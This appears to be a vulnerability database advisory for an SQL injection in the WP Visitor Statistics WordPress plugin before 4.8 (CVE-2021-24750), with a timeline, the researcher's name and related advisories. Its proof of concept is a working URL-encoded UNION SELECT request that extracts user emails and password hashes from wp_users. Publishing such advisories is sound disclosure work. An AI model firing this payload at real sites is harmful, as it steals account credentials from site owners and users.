WP Visitor Statistics (Real Time Traffic) < 4.8 – Subscriber+ SQL Injection | CVE 2021-24750 | Plugin Vulnerabilities

Description

The plugin does not properly sanitise and escape the refUrl in the refDetails AJAX action, available to any authenticated user, which could allow users with a role as low as subscriber to perform SQL injection attacks

Proof of Concept

https://example.com/wp-admin/admin-ajax.php?action=refDetails&requests=%7B%22refUrl%22:%22%27%20union%20select%201,1,user_email,user_pass%20from%20wp_users%20--%20g%22%7D

Affects Plugins

wp-stats-manager

Fixed in 4.8

References

CVE

Exploitdb

URL

https://plugins.trac.wordpress.org/changeset/2622268

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

Krzysztof Zając

Submitter

Krzysztof Zając

Submitter website

https://kazet.cc/

Verified

Yes

WPVDB ID

7528aded-b8c9-4833-89d6-9cd7df3620de

Timeline

Publicly Published

2021-11-22 (about 4 years ago)

Added

2021-11-22 (about 4 years ago)

Last Updated

2022-04-11 (about 3 years ago)

Other

Published

Title

Published

2014-08-01

Title

Disqus Blog Comments < 2.7.8 - Blind SQL Injection

Published

2021-02-08

Title

Data Tables Generator by Supsystic < 1.10.0 - Authenticated SQL Injection

Published

2014-08-01

Title

WP Symposium < 12.12 - Multiple SQL Injections

Published

2023-09-11

Title

WP Sessions Time Monitoring Full Automatic < 1.0.9 - Unauthenticated SQL injection

Published

2025-05-16

Title

CountDown Pro WP Plugin <= 2.7 - Authenticated (Contributor+) SQL Injection